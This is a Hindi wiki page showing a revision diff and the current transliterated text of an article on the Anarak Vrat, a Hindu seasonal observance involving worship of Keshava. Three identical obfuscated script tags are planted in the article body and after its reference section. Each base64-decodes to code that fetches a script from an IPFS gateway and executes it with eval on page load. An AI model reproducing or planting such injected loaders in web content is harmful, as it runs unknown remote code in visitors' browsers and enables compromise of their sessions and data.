Difference between revisions of "अनरक व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*मार्ग शुक्लपक्ष [[प्रतिपदा]] को आरम्भ, यह ऋतुव्रत है, दो ऋतुओं के लिए यह व्रत किया जाता है- हेमन्त एवं शिविर।
+
*[[मार्ग]] [[शुक्ल पक्ष]] [[प्रतिपदा]] को आरम्भ, यह ऋतुव्रत है, दो ऋतुओं के लिए यह व्रत किया जाता है- हेमन्त एवं शिविर।
 
*अनरक व्रत में [[केशव]] की पूजा होती है।  
 
*अनरक व्रत में [[केशव]] की पूजा होती है।  
*'ओं नमः केशवाय' का 108 बार जप, [[द्वादशी]] को विशेष कृत्य किया जाता है।<ref>हेमाद्रि (व्रतखण्ड, 2, 839–42, विष्णुरहस्य से उद्धरण)</ref>
+
*'ओं नमः केशवाय' का 108 बार जप, [[द्वादशी]] को विशेष कृत्य किया जाता है।<ref>हेमाद्रि (व्रतखण्ड, 2, 839–42, विष्णुरहस्य से उद्धरण</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:36, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • marg shukl paksh pratipada ko arambh, yah rrituvrat hai, do rrituoan ke lie yah vrat kiya jata hai- hemant evan shivir.
  • anarak vrat mean keshav ki pooja hoti hai.
  • 'oan namah keshavay' ka 108 bar jap, dvadashi ko vishesh krity kiya jata hai.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand, 2, 839–42, vishnurahasy se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>